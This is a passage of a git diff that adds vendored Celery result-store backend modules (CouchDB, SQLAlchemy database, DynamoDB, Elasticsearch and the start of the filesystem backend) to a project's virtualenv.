self.connection.remove(key) diff --git a/env/Lib/site-packages/celery/backends/couchdb.py b/env/Lib/site-packages/celery/backends/couchdb.py new file mode 100644 index 00000000..a4b040da --- /dev/null +++ b/env/Lib/site-packages/celery/backends/couchdb.py @@ -0,0 +1,99 @@ +"""CouchDB result store backend.""" +from kombu.utils.encoding import bytes_to_str +from kombu.utils.url import _parse_url + +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + import pycouchdb +except ImportError: + pycouchdb = None + +__all__ = ('CouchBackend',) + +ERR_LIB_MISSING = """\ +You need to install the pycouchdb library to use the CouchDB result backend\ +""" + + +class CouchBackend(KeyValueStoreBackend): + """CouchDB backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`pycouchdb` is not available. + """ + + container = 'default' + scheme = 'http' + host = 'localhost' + port = 5984 + username = None + password = None + + def __init__(self, url=None, *args, **kwargs): + super().__init__(*args, **kwargs) + self.url = url + + if pycouchdb is None: + raise ImproperlyConfigured(ERR_LIB_MISSING) + + uscheme = uhost = uport = uname = upass = ucontainer = None + if url: + _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url) + ucontainer = ucontainer.strip('/') if ucontainer else None + + self.scheme = uscheme or self.scheme + self.host = uhost or self.host + self.port = int(uport or self.port) + self.container = ucontainer or self.container + self.username = uname or self.username + self.password = upass or self.password + + self._connection = None + + def _get_connection(self): + """Connect to the CouchDB server.""" + if self.username and self.password: + conn_string = f'{self.scheme}://{self.username}:{self.password}@{self.host}:{self.port}' + server = pycouchdb.Server(conn_string, authmethod='basic') + else: + conn_string = f'{self.scheme}://{self.host}:{self.port}' + server = pycouchdb.Server(conn_string) + + try: + return server.database(self.container) + except pycouchdb.exceptions.NotFound: + return server.create(self.container) + + @property + def connection(self): + if self._connection is None: + self._connection = self._get_connection() + return self._connection + + def get(self, key): + key = bytes_to_str(key) + try: + return self.connection.get(key)['value'] + except pycouchdb.exceptions.NotFound: + return None + + def set(self, key, value): + key = bytes_to_str(key) + data = {'_id': key, 'value': value} + try: + self.connection.save(data) + except pycouchdb.exceptions.Conflict: + # document already exists, update it + data = self.connection.get(key) + data['value'] = value + self.connection.save(data) + + def mget(self, keys): + return [self.get(key) for key in keys] + + def delete(self, key): + self.connection.delete(key) diff --git a/env/Lib/site-packages/celery/backends/database/__init__.py b/env/Lib/site-packages/celery/backends/database/__init__.py new file mode 100644 index 00000000..91080adc --- /dev/null +++ b/env/Lib/site-packages/celery/backends/database/__init__.py @@ -0,0 +1,222 @@ +"""SQLAlchemy result store backend.""" +import logging +from contextlib import contextmanager + +from vine.utils import wraps + +from celery import states +from celery.backends.base import BaseBackend +from celery.exceptions import ImproperlyConfigured +from celery.utils.time import maybe_timedelta + +from .models import Task, TaskExtended, TaskSet +from .session import SessionManager + +try: + from sqlalchemy.exc import 
DatabaseError, InvalidRequestError + from sqlalchemy.orm.exc import StaleDataError +except ImportError: + raise ImproperlyConfigured( + 'The database result backend requires SQLAlchemy to be installed.' + 'See https://pypi.org/project/SQLAlchemy/') + +logger = logging.getLogger(__name__) + +__all__ = ('DatabaseBackend',) + + +@contextmanager +def session_cleanup(session): + try: + yield + except Exception: + session.rollback() + raise + finally: + session.close() + + +def retry(fun): + + @wraps(fun) + def _inner(*args, **kwargs): + max_retries = kwargs.pop('max_retries', 3) + + for retries in range(max_retries): + try: + return fun(*args, **kwargs) + except (DatabaseError, InvalidRequestError, StaleDataError): + logger.warning( + 'Failed operation %s. Retrying %s more times.', + fun.__name__, max_retries - retries - 1, + exc_info=True) + if retries + 1 >= max_retries: + raise + + return _inner + + +class DatabaseBackend(BaseBackend): + """The database result backend.""" + + # ResultSet.iterate should sleep this much between each pool, + # to not bombard the database with queries. + subpolling_interval = 0.5 + + task_cls = Task + taskset_cls = TaskSet + + def __init__(self, dburi=None, engine_options=None, url=None, **kwargs): + # The `url` argument was added later and is used by + # the app to set backend by url (celery.app.backends.by_url) + super().__init__(expires_type=maybe_timedelta, + url=url, **kwargs) + conf = self.app.conf + + if self.extended_result: + self.task_cls = TaskExtended + + self.url = url or dburi or conf.database_url + self.engine_options = dict( + engine_options or {}, + **conf.database_engine_options or {}) + self.short_lived_sessions = kwargs.get( + 'short_lived_sessions', + conf.database_short_lived_sessions) + + schemas = conf.database_table_schemas or {} + tablenames = conf.database_table_names or {} + self.task_cls.configure( + schema=schemas.get('task'), + name=tablenames.get('task')) + self.taskset_cls.configure( + schema=schemas.get('group'), + name=tablenames.get('group')) + + if not self.url: + raise ImproperlyConfigured( + 'Missing connection string! Do you have the' + ' database_url setting set to a real value?') + + @property + def extended_result(self): + return self.app.conf.find_value_for_key('extended', 'result') + + def ResultSession(self, session_manager=SessionManager()): + return session_manager.session_factory( + dburi=self.url, + short_lived_sessions=self.short_lived_sessions, + **self.engine_options) + + @retry + def _store_result(self, task_id, result, state, traceback=None, + request=None, **kwargs): + """Store return value and state of an executed task.""" + session = self.ResultSession() + with session_cleanup(session): + task = list(session.query(self.task_cls).filter(self.task_cls.task_id == task_id)) + task = task and task[0] + if not task: + task = self.task_cls(task_id) + task.task_id = task_id + session.add(task) + session.flush() + + self._update_result(task, result, state, traceback=traceback, request=request) + session.commit() + + def _update_result(self, task, result, state, traceback=None, + request=None): + + meta = self._get_result_meta(result=result, state=state, + traceback=traceback, request=request, + format_date=False, encode=True) + + # Exclude the primary key id and task_id columns + # as we should not set it None + columns = [column.name for column in self.task_cls.__table__.columns + if column.name not in {'id', 'task_id'}] + + # Iterate through the columns name of the table + # to set the value from meta. 
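# (For instance, with extended results enabled, the meta dict built by
#  _get_result_meta() also carries 'name', 'args', 'kwargs', 'worker',
#  'retries' and 'queue', each of which lands on the matching TaskExtended
#  column here.)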
+ # If the value is not present in meta, set None + for column in columns: + value = meta.get(column) + setattr(task, column, value) + + @retry + def _get_task_meta_for(self, task_id): + """Get task meta-data for a task by id.""" + session = self.ResultSession() + with session_cleanup(session): + task = list(session.query(self.task_cls).filter(self.task_cls.task_id == task_id)) + task = task and task[0] + if not task: + task = self.task_cls(task_id) + task.status = states.PENDING + task.result = None + data = task.to_dict() + if data.get('args', None) is not None: + data['args'] = self.decode(data['args']) + if data.get('kwargs', None) is not None: + data['kwargs'] = self.decode(data['kwargs']) + return self.meta_from_decoded(data) + + @retry + def _save_group(self, group_id, result): + """Store the result of an executed group.""" + session = self.ResultSession() + with session_cleanup(session): + group = self.taskset_cls(group_id, result) + session.add(group) + session.flush() + session.commit() + return result + + @retry + def _restore_group(self, group_id): + """Get meta-data for group by id.""" + session = self.ResultSession() + with session_cleanup(session): + group = session.query(self.taskset_cls).filter( + self.taskset_cls.taskset_id == group_id).first() + if group: + return group.to_dict() + + @retry + def _delete_group(self, group_id): + """Delete meta-data for group by id.""" + session = self.ResultSession() + with session_cleanup(session): + session.query(self.taskset_cls).filter( + self.taskset_cls.taskset_id == group_id).delete() + session.flush() + session.commit() + + @retry + def _forget(self, task_id): + """Forget about result.""" + session = self.ResultSession() + with session_cleanup(session): + session.query(self.task_cls).filter(self.task_cls.task_id == task_id).delete() + session.commit() + + def cleanup(self): + """Delete expired meta-data.""" + session = self.ResultSession() + expires = self.expires + now = self.app.now() + with session_cleanup(session): + session.query(self.task_cls).filter( + self.task_cls.date_done < (now - expires)).delete() + session.query(self.taskset_cls).filter( + self.taskset_cls.date_done < (now - expires)).delete() + session.commit() + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + kwargs.update( + {'dburi': self.url, + 'expires': self.expires, + 'engine_options': self.engine_options}) + return super().__reduce__(args, kwargs) diff --git a/env/Lib/site-packages/celery/backends/database/models.py b/env/Lib/site-packages/celery/backends/database/models.py new file mode 100644 index 00000000..1c766b51 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/database/models.py @@ -0,0 +1,108 @@ +"""Database models used by the SQLAlchemy result store backend.""" +from datetime import datetime + +import sqlalchemy as sa +from sqlalchemy.types import PickleType + +from celery import states + +from .session import ResultModelBase + +__all__ = ('Task', 'TaskExtended', 'TaskSet') + + +class Task(ResultModelBase): + """Task result/status.""" + + __tablename__ = 'celery_taskmeta' + __table_args__ = {'sqlite_autoincrement': True} + + id = sa.Column(sa.Integer, sa.Sequence('task_id_sequence'), + primary_key=True, autoincrement=True) + task_id = sa.Column(sa.String(155), unique=True) + status = sa.Column(sa.String(50), default=states.PENDING) + result = sa.Column(PickleType, nullable=True) + date_done = sa.Column(sa.DateTime, default=datetime.utcnow, + onupdate=datetime.utcnow, nullable=True) + traceback = 
sa.Column(sa.Text, nullable=True) + + def __init__(self, task_id): + self.task_id = task_id + + def to_dict(self): + return { + 'task_id': self.task_id, + 'status': self.status, + 'result': self.result, + 'traceback': self.traceback, + 'date_done': self.date_done, + } + + def __repr__(self): + return ''.format(self) + + @classmethod + def configure(cls, schema=None, name=None): + cls.__table__.schema = schema + cls.id.default.schema = schema + cls.__table__.name = name or cls.__tablename__ + + +class TaskExtended(Task): + """For the extend result.""" + + __tablename__ = 'celery_taskmeta' + __table_args__ = {'sqlite_autoincrement': True, 'extend_existing': True} + + name = sa.Column(sa.String(155), nullable=True) + args = sa.Column(sa.LargeBinary, nullable=True) + kwargs = sa.Column(sa.LargeBinary, nullable=True) + worker = sa.Column(sa.String(155), nullable=True) + retries = sa.Column(sa.Integer, nullable=True) + queue = sa.Column(sa.String(155), nullable=True) + + def to_dict(self): + task_dict = super().to_dict() + task_dict.update({ + 'name': self.name, + 'args': self.args, + 'kwargs': self.kwargs, + 'worker': self.worker, + 'retries': self.retries, + 'queue': self.queue, + }) + return task_dict + + +class TaskSet(ResultModelBase): + """TaskSet result.""" + + __tablename__ = 'celery_tasksetmeta' + __table_args__ = {'sqlite_autoincrement': True} + + id = sa.Column(sa.Integer, sa.Sequence('taskset_id_sequence'), + autoincrement=True, primary_key=True) + taskset_id = sa.Column(sa.String(155), unique=True) + result = sa.Column(PickleType, nullable=True) + date_done = sa.Column(sa.DateTime, default=datetime.utcnow, + nullable=True) + + def __init__(self, taskset_id, result): + self.taskset_id = taskset_id + self.result = result + + def to_dict(self): + return { + 'taskset_id': self.taskset_id, + 'result': self.result, + 'date_done': self.date_done, + } + + def __repr__(self): + return f'' + + @classmethod + def configure(cls, schema=None, name=None): + cls.__table__.schema = schema + cls.id.default.schema = schema + cls.__table__.name = name or cls.__tablename__ diff --git a/env/Lib/site-packages/celery/backends/database/session.py b/env/Lib/site-packages/celery/backends/database/session.py new file mode 100644 index 00000000..415d4623 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/database/session.py @@ -0,0 +1,89 @@ +"""SQLAlchemy session.""" +import time + +from kombu.utils.compat import register_after_fork +from sqlalchemy import create_engine +from sqlalchemy.exc import DatabaseError +from sqlalchemy.orm import sessionmaker +from sqlalchemy.pool import NullPool + +from celery.utils.time import get_exponential_backoff_interval + +try: + from sqlalchemy.orm import declarative_base +except ImportError: + # TODO: Remove this once we drop support for SQLAlchemy < 1.4. 
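# (declarative_base() moved to sqlalchemy.orm in SQLAlchemy 1.4; the fallback
#  import below keeps older SQLAlchemy releases working.)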
+ from sqlalchemy.ext.declarative import declarative_base + +ResultModelBase = declarative_base() + +__all__ = ('SessionManager',) + +PREPARE_MODELS_MAX_RETRIES = 10 + + +def _after_fork_cleanup_session(session): + session._after_fork() + + +class SessionManager: + """Manage SQLAlchemy sessions.""" + + def __init__(self): + self._engines = {} + self._sessions = {} + self.forked = False + self.prepared = False + if register_after_fork is not None: + register_after_fork(self, _after_fork_cleanup_session) + + def _after_fork(self): + self.forked = True + + def get_engine(self, dburi, **kwargs): + if self.forked: + try: + return self._engines[dburi] + except KeyError: + engine = self._engines[dburi] = create_engine(dburi, **kwargs) + return engine + else: + kwargs = {k: v for k, v in kwargs.items() if + not k.startswith('pool')} + return create_engine(dburi, poolclass=NullPool, **kwargs) + + def create_session(self, dburi, short_lived_sessions=False, **kwargs): + engine = self.get_engine(dburi, **kwargs) + if self.forked: + if short_lived_sessions or dburi not in self._sessions: + self._sessions[dburi] = sessionmaker(bind=engine) + return engine, self._sessions[dburi] + return engine, sessionmaker(bind=engine) + + def prepare_models(self, engine): + if not self.prepared: + # SQLAlchemy will check if the items exist before trying to + # create them, which is a race condition. If it raises an error + # in one iteration, the next may pass all the existence checks + # and the call will succeed. + retries = 0 + while True: + try: + ResultModelBase.metadata.create_all(engine) + except DatabaseError: + if retries < PREPARE_MODELS_MAX_RETRIES: + sleep_amount_ms = get_exponential_backoff_interval( + 10, retries, 1000, True + ) + time.sleep(sleep_amount_ms / 1000) + retries += 1 + else: + raise + else: + break + self.prepared = True + + def session_factory(self, dburi, **kwargs): + engine, session = self.create_session(dburi, **kwargs) + self.prepare_models(engine) + return session() diff --git a/env/Lib/site-packages/celery/backends/dynamodb.py b/env/Lib/site-packages/celery/backends/dynamodb.py new file mode 100644 index 00000000..90fbae09 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/dynamodb.py @@ -0,0 +1,493 @@ +"""AWS DynamoDB result store backend.""" +from collections import namedtuple +from time import sleep, time + +from kombu.utils.url import _parse_url as parse_url + +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +from .base import KeyValueStoreBackend + +try: + import boto3 + from botocore.exceptions import ClientError +except ImportError: + boto3 = ClientError = None + +__all__ = ('DynamoDBBackend',) + + +# Helper class that describes a DynamoDB attribute +DynamoDBAttribute = namedtuple('DynamoDBAttribute', ('name', 'data_type')) + +logger = get_logger(__name__) + + +class DynamoDBBackend(KeyValueStoreBackend): + """AWS DynamoDB result backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`boto3` is not available. 
+ """ + + #: default DynamoDB table name (`default`) + table_name = 'celery' + + #: Read Provisioned Throughput (`default`) + read_capacity_units = 1 + + #: Write Provisioned Throughput (`default`) + write_capacity_units = 1 + + #: AWS region (`default`) + aws_region = None + + #: The endpoint URL that is passed to boto3 (local DynamoDB) (`default`) + endpoint_url = None + + #: Item time-to-live in seconds (`default`) + time_to_live_seconds = None + + # DynamoDB supports Time to Live as an auto-expiry mechanism. + supports_autoexpire = True + + _key_field = DynamoDBAttribute(name='id', data_type='S') + _value_field = DynamoDBAttribute(name='result', data_type='B') + _timestamp_field = DynamoDBAttribute(name='timestamp', data_type='N') + _ttl_field = DynamoDBAttribute(name='ttl', data_type='N') + _available_fields = None + + def __init__(self, url=None, table_name=None, *args, **kwargs): + super().__init__(*args, **kwargs) + + self.url = url + self.table_name = table_name or self.table_name + + if not boto3: + raise ImproperlyConfigured( + 'You need to install the boto3 library to use the ' + 'DynamoDB backend.') + + aws_credentials_given = False + aws_access_key_id = None + aws_secret_access_key = None + + if url is not None: + scheme, region, port, username, password, table, query = \ + parse_url(url) + + aws_access_key_id = username + aws_secret_access_key = password + + access_key_given = aws_access_key_id is not None + secret_key_given = aws_secret_access_key is not None + + if access_key_given != secret_key_given: + raise ImproperlyConfigured( + 'You need to specify both the Access Key ID ' + 'and Secret.') + + aws_credentials_given = access_key_given + + if region == 'localhost': + # We are using the downloadable, local version of DynamoDB + self.endpoint_url = f'http://localhost:{port}' + self.aws_region = 'us-east-1' + logger.warning( + 'Using local-only DynamoDB endpoint URL: {}'.format( + self.endpoint_url + ) + ) + else: + self.aws_region = region + + # If endpoint_url is explicitly set use it instead + _get = self.app.conf.get + config_endpoint_url = _get('dynamodb_endpoint_url') + if config_endpoint_url: + self.endpoint_url = config_endpoint_url + + self.read_capacity_units = int( + query.get( + 'read', + self.read_capacity_units + ) + ) + self.write_capacity_units = int( + query.get( + 'write', + self.write_capacity_units + ) + ) + + ttl = query.get('ttl_seconds', self.time_to_live_seconds) + if ttl: + try: + self.time_to_live_seconds = int(ttl) + except ValueError as e: + logger.error( + f'TTL must be a number; got "{ttl}"', + exc_info=e + ) + raise e + + self.table_name = table or self.table_name + + self._available_fields = ( + self._key_field, + self._value_field, + self._timestamp_field + ) + + self._client = None + if aws_credentials_given: + self._get_client( + access_key_id=aws_access_key_id, + secret_access_key=aws_secret_access_key + ) + + def _get_client(self, access_key_id=None, secret_access_key=None): + """Get client connection.""" + if self._client is None: + client_parameters = { + 'region_name': self.aws_region + } + if access_key_id is not None: + client_parameters.update({ + 'aws_access_key_id': access_key_id, + 'aws_secret_access_key': secret_access_key + }) + + if self.endpoint_url is not None: + client_parameters['endpoint_url'] = self.endpoint_url + + self._client = boto3.client( + 'dynamodb', + **client_parameters + ) + self._get_or_create_table() + + if self._has_ttl() is not None: + self._validate_ttl_methods() + self._set_table_ttl() + + return 
self._client + + def _get_table_schema(self): + """Get the boto3 structure describing the DynamoDB table schema.""" + return { + 'AttributeDefinitions': [ + { + 'AttributeName': self._key_field.name, + 'AttributeType': self._key_field.data_type + } + ], + 'TableName': self.table_name, + 'KeySchema': [ + { + 'AttributeName': self._key_field.name, + 'KeyType': 'HASH' + } + ], + 'ProvisionedThroughput': { + 'ReadCapacityUnits': self.read_capacity_units, + 'WriteCapacityUnits': self.write_capacity_units + } + } + + def _get_or_create_table(self): + """Create table if not exists, otherwise return the description.""" + table_schema = self._get_table_schema() + try: + return self._client.describe_table(TableName=self.table_name) + except ClientError as e: + error_code = e.response['Error'].get('Code', 'Unknown') + + if error_code == 'ResourceNotFoundException': + table_description = self._client.create_table(**table_schema) + logger.info( + 'DynamoDB Table {} did not exist, creating.'.format( + self.table_name + ) + ) + # In case we created the table, wait until it becomes available. + self._wait_for_table_status('ACTIVE') + logger.info( + 'DynamoDB Table {} is now available.'.format( + self.table_name + ) + ) + return table_description + else: + raise e + + def _has_ttl(self): + """Return the desired Time to Live config. + + - True: Enable TTL on the table; use expiry. + - False: Disable TTL on the table; don't use expiry. + - None: Ignore TTL on the table; don't use expiry. + """ + return None if self.time_to_live_seconds is None \ + else self.time_to_live_seconds >= 0 + + def _validate_ttl_methods(self): + """Verify boto support for the DynamoDB Time to Live methods.""" + # Required TTL methods. + required_methods = ( + 'update_time_to_live', + 'describe_time_to_live', + ) + + # Find missing methods. + missing_methods = [] + for method in list(required_methods): + if not hasattr(self._client, method): + missing_methods.append(method) + + if missing_methods: + logger.error( + ( + 'boto3 method(s) {methods} not found; ensure that ' + 'boto3>=1.9.178 and botocore>=1.12.178 are installed' + ).format( + methods=','.join(missing_methods) + ) + ) + raise AttributeError( + 'boto3 method(s) {methods} not found'.format( + methods=','.join(missing_methods) + ) + ) + + def _get_ttl_specification(self, ttl_attr_name): + """Get the boto3 structure describing the DynamoDB TTL specification.""" + return { + 'TableName': self.table_name, + 'TimeToLiveSpecification': { + 'Enabled': self._has_ttl(), + 'AttributeName': ttl_attr_name + } + } + + def _get_table_ttl_description(self): + # Get the current TTL description. + try: + description = self._client.describe_time_to_live( + TableName=self.table_name + ) + except ClientError as e: + error_code = e.response['Error'].get('Code', 'Unknown') + error_message = e.response['Error'].get('Message', 'Unknown') + logger.error(( + 'Error describing Time to Live on DynamoDB table {table}: ' + '{code}: {message}' + ).format( + table=self.table_name, + code=error_code, + message=error_message, + )) + raise e + + return description + + def _set_table_ttl(self): + """Enable or disable Time to Live on the table.""" + # Get the table TTL description, and return early when possible. 
+ description = self._get_table_ttl_description() + status = description['TimeToLiveDescription']['TimeToLiveStatus'] + if status in ('ENABLED', 'ENABLING'): + cur_attr_name = \ + description['TimeToLiveDescription']['AttributeName'] + if self._has_ttl(): + if cur_attr_name == self._ttl_field.name: + # We want TTL enabled, and it is currently enabled or being + # enabled, and on the correct attribute. + logger.debug(( + 'DynamoDB Time to Live is {situation} ' + 'on table {table}' + ).format( + situation='already enabled' + if status == 'ENABLED' + else 'currently being enabled', + table=self.table_name + )) + return description + + elif status in ('DISABLED', 'DISABLING'): + if not self._has_ttl(): + # We want TTL disabled, and it is currently disabled or being + # disabled. + logger.debug(( + 'DynamoDB Time to Live is {situation} ' + 'on table {table}' + ).format( + situation='already disabled' + if status == 'DISABLED' + else 'currently being disabled', + table=self.table_name + )) + return description + + # The state shouldn't ever have any value beyond the four handled + # above, but to ease troubleshooting of potential future changes, emit + # a log showing the unknown state. + else: # pragma: no cover + logger.warning(( + 'Unknown DynamoDB Time to Live status {status} ' + 'on table {table}. Attempting to continue.' + ).format( + status=status, + table=self.table_name + )) + + # At this point, we have one of the following situations: + # + # We want TTL enabled, + # + # - and it's currently disabled: Try to enable. + # + # - and it's being disabled: Try to enable, but this is almost sure to + # raise ValidationException with message: + # + # Time to live has been modified multiple times within a fixed + # interval + # + # - and it's currently enabling or being enabled, but on the wrong + # attribute: Try to enable, but this will raise ValidationException + # with message: + # + # TimeToLive is active on a different AttributeName: current + # AttributeName is ttlx + # + # We want TTL disabled, + # + # - and it's currently enabled: Try to disable. 
+ # + # - and it's being enabled: Try to disable, but this is almost sure to + # raise ValidationException with message: + # + # Time to live has been modified multiple times within a fixed + # interval + # + attr_name = \ + cur_attr_name if status == 'ENABLED' else self._ttl_field.name + try: + specification = self._client.update_time_to_live( + **self._get_ttl_specification( + ttl_attr_name=attr_name + ) + ) + logger.info( + ( + 'DynamoDB table Time to Live updated: ' + 'table={table} enabled={enabled} attribute={attr}' + ).format( + table=self.table_name, + enabled=self._has_ttl(), + attr=self._ttl_field.name + ) + ) + return specification + except ClientError as e: + error_code = e.response['Error'].get('Code', 'Unknown') + error_message = e.response['Error'].get('Message', 'Unknown') + logger.error(( + 'Error {action} Time to Live on DynamoDB table {table}: ' + '{code}: {message}' + ).format( + action='enabling' if self._has_ttl() else 'disabling', + table=self.table_name, + code=error_code, + message=error_message, + )) + raise e + + def _wait_for_table_status(self, expected='ACTIVE'): + """Poll for the expected table status.""" + achieved_state = False + while not achieved_state: + table_description = self.client.describe_table( + TableName=self.table_name + ) + logger.debug( + 'Waiting for DynamoDB table {} to become {}.'.format( + self.table_name, + expected + ) + ) + current_status = table_description['Table']['TableStatus'] + achieved_state = current_status == expected + sleep(1) + + def _prepare_get_request(self, key): + """Construct the item retrieval request parameters.""" + return { + 'TableName': self.table_name, + 'Key': { + self._key_field.name: { + self._key_field.data_type: key + } + } + } + + def _prepare_put_request(self, key, value): + """Construct the item creation request parameters.""" + timestamp = time() + put_request = { + 'TableName': self.table_name, + 'Item': { + self._key_field.name: { + self._key_field.data_type: key + }, + self._value_field.name: { + self._value_field.data_type: value + }, + self._timestamp_field.name: { + self._timestamp_field.data_type: str(timestamp) + } + } + } + if self._has_ttl(): + put_request['Item'].update({ + self._ttl_field.name: { + self._ttl_field.data_type: + str(int(timestamp + self.time_to_live_seconds)) + } + }) + return put_request + + def _item_to_dict(self, raw_response): + """Convert get_item() response to field-value pairs.""" + if 'Item' not in raw_response: + return {} + return { + field.name: raw_response['Item'][field.name][field.data_type] + for field in self._available_fields + } + + @property + def client(self): + return self._get_client() + + def get(self, key): + key = str(key) + request_parameters = self._prepare_get_request(key) + item_response = self.client.get_item(**request_parameters) + item = self._item_to_dict(item_response) + return item.get(self._value_field.name) + + def set(self, key, value): + key = str(key) + request_parameters = self._prepare_put_request(key, value) + self.client.put_item(**request_parameters) + + def mget(self, keys): + return [self.get(key) for key in keys] + + def delete(self, key): + key = str(key) + request_parameters = self._prepare_get_request(key) + self.client.delete_item(**request_parameters) diff --git a/env/Lib/site-packages/celery/backends/elasticsearch.py b/env/Lib/site-packages/celery/backends/elasticsearch.py new file mode 100644 index 00000000..54481297 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/elasticsearch.py @@ -0,0 +1,248 @@ 
+"""Elasticsearch result store backend.""" +from datetime import datetime + +from kombu.utils.encoding import bytes_to_str +from kombu.utils.url import _parse_url + +from celery import states +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + import elasticsearch +except ImportError: + elasticsearch = None + +__all__ = ('ElasticsearchBackend',) + +E_LIB_MISSING = """\ +You need to install the elasticsearch library to use the Elasticsearch \ +result backend.\ +""" + + +class ElasticsearchBackend(KeyValueStoreBackend): + """Elasticsearch Backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`elasticsearch` is not available. + """ + + index = 'celery' + doc_type = 'backend' + scheme = 'http' + host = 'localhost' + port = 9200 + username = None + password = None + es_retry_on_timeout = False + es_timeout = 10 + es_max_retries = 3 + + def __init__(self, url=None, *args, **kwargs): + super().__init__(*args, **kwargs) + self.url = url + _get = self.app.conf.get + + if elasticsearch is None: + raise ImproperlyConfigured(E_LIB_MISSING) + + index = doc_type = scheme = host = port = username = password = None + + if url: + scheme, host, port, username, password, path, _ = _parse_url(url) + if scheme == 'elasticsearch': + scheme = None + if path: + path = path.strip('/') + index, _, doc_type = path.partition('/') + + self.index = index or self.index + self.doc_type = doc_type or self.doc_type + self.scheme = scheme or self.scheme + self.host = host or self.host + self.port = port or self.port + self.username = username or self.username + self.password = password or self.password + + self.es_retry_on_timeout = ( + _get('elasticsearch_retry_on_timeout') or self.es_retry_on_timeout + ) + + es_timeout = _get('elasticsearch_timeout') + if es_timeout is not None: + self.es_timeout = es_timeout + + es_max_retries = _get('elasticsearch_max_retries') + if es_max_retries is not None: + self.es_max_retries = es_max_retries + + self.es_save_meta_as_text = _get('elasticsearch_save_meta_as_text', True) + self._server = None + + def exception_safe_to_retry(self, exc): + if isinstance(exc, (elasticsearch.exceptions.TransportError)): + # 401: Unauthorized + # 409: Conflict + # 429: Too Many Requests + # 500: Internal Server Error + # 502: Bad Gateway + # 503: Service Unavailable + # 504: Gateway Timeout + # N/A: Low level exception (i.e. 
socket exception) + if exc.status_code in {401, 409, 429, 500, 502, 503, 504, 'N/A'}: + return True + return False + + def get(self, key): + try: + res = self._get(key) + try: + if res['found']: + return res['_source']['result'] + except (TypeError, KeyError): + pass + except elasticsearch.exceptions.NotFoundError: + pass + + def _get(self, key): + return self.server.get( + index=self.index, + doc_type=self.doc_type, + id=key, + ) + + def _set_with_state(self, key, value, state): + body = { + 'result': value, + '@timestamp': '{}Z'.format( + datetime.utcnow().isoformat()[:-3] + ), + } + try: + self._index( + id=key, + body=body, + ) + except elasticsearch.exceptions.ConflictError: + # document already exists, update it + self._update(key, body, state) + + def set(self, key, value): + return self._set_with_state(key, value, None) + + def _index(self, id, body, **kwargs): + body = {bytes_to_str(k): v for k, v in body.items()} + return self.server.index( + id=bytes_to_str(id), + index=self.index, + doc_type=self.doc_type, + body=body, + params={'op_type': 'create'}, + **kwargs + ) + + def _update(self, id, body, state, **kwargs): + """Update state in a conflict free manner. + + If state is defined (not None), this will not update ES server if either: + * existing state is success + * existing state is a ready state and current state in not a ready state + + This way, a Retry state cannot override a Success or Failure, and chord_unlock + will not retry indefinitely. + """ + body = {bytes_to_str(k): v for k, v in body.items()} + + try: + res_get = self._get(key=id) + if not res_get.get('found'): + return self._index(id, body, **kwargs) + # document disappeared between index and get calls. + except elasticsearch.exceptions.NotFoundError: + return self._index(id, body, **kwargs) + + try: + meta_present_on_backend = self.decode_result(res_get['_source']['result']) + except (TypeError, KeyError): + pass + else: + if meta_present_on_backend['status'] == states.SUCCESS: + # if stored state is already in success, do nothing + return {'result': 'noop'} + elif meta_present_on_backend['status'] in states.READY_STATES and state in states.UNREADY_STATES: + # if stored state is in ready state and current not, do nothing + return {'result': 'noop'} + + # get current sequence number and primary term + # https://www.elastic.co/guide/en/elasticsearch/reference/current/optimistic-concurrency-control.html + seq_no = res_get.get('_seq_no', 1) + prim_term = res_get.get('_primary_term', 1) + + # try to update document with current seq_no and primary_term + res = self.server.update( + id=bytes_to_str(id), + index=self.index, + doc_type=self.doc_type, + body={'doc': body}, + params={'if_primary_term': prim_term, 'if_seq_no': seq_no}, + **kwargs + ) + # result is elastic search update query result + # noop = query did not update any document + # updated = at least one document got updated + if res['result'] == 'noop': + raise elasticsearch.exceptions.ConflictError(409, 'conflicting update occurred concurrently', {}) + return res + + def encode(self, data): + if self.es_save_meta_as_text: + return super().encode(data) + else: + if not isinstance(data, dict): + return super().encode(data) + if data.get("result"): + data["result"] = self._encode(data["result"])[2] + if data.get("traceback"): + data["traceback"] = self._encode(data["traceback"])[2] + return data + + def decode(self, payload): + if self.es_save_meta_as_text: + return super().decode(payload) + else: + if not isinstance(payload, dict): + return 
super().decode(payload) + if payload.get("result"): + payload["result"] = super().decode(payload["result"]) + if payload.get("traceback"): + payload["traceback"] = super().decode(payload["traceback"]) + return payload + + def mget(self, keys): + return [self.get(key) for key in keys] + + def delete(self, key): + self.server.delete(index=self.index, doc_type=self.doc_type, id=key) + + def _get_server(self): + """Connect to the Elasticsearch server.""" + http_auth = None + if self.username and self.password: + http_auth = (self.username, self.password) + return elasticsearch.Elasticsearch( + f'{self.host}:{self.port}', + retry_on_timeout=self.es_retry_on_timeout, + max_retries=self.es_max_retries, + timeout=self.es_timeout, + scheme=self.scheme, + http_auth=http_auth, + ) + + @property + def server(self): + if self._server is None: + self._server = self._get_server() + return self._server diff --git a/env/Lib/site-packages/celery/backends/filesystem.py b/env/Lib/site-packages/celery/backends/filesystem.py new file mode 100644 index 00000000..22fd5dcf --- /dev/null +++ b/env/Lib/site-packages/celery/backends/filesystem.py @@ -0,0 +1,112 @@ +"""File-system result store backend.""" +import locale +import os +from datetime import datetime + +from kombu.utils.encoding import ensure_bytes + +from celery import uuid +from celery.backends.base import KeyValueStoreBackend +from celery.exceptions import ImproperlyConfigured + +default_encoding = locale.getpreferredencoding(False) + +E_NO_PATH_SET = 'You need to configure a path for the file-system backend' +E_PATH_NON_CONFORMING_SCHEME = ( + 'A path for the file-system backend should conform to the file URI scheme' +) +E_PATH_INVALID = """\ +The configured path for the file-system backend does not +work correctly, please make sure that it exists and has +the correct permissions.\ +""" + + +class FilesystemBackend(KeyValueStoreBackend): + """File-system result backend. 
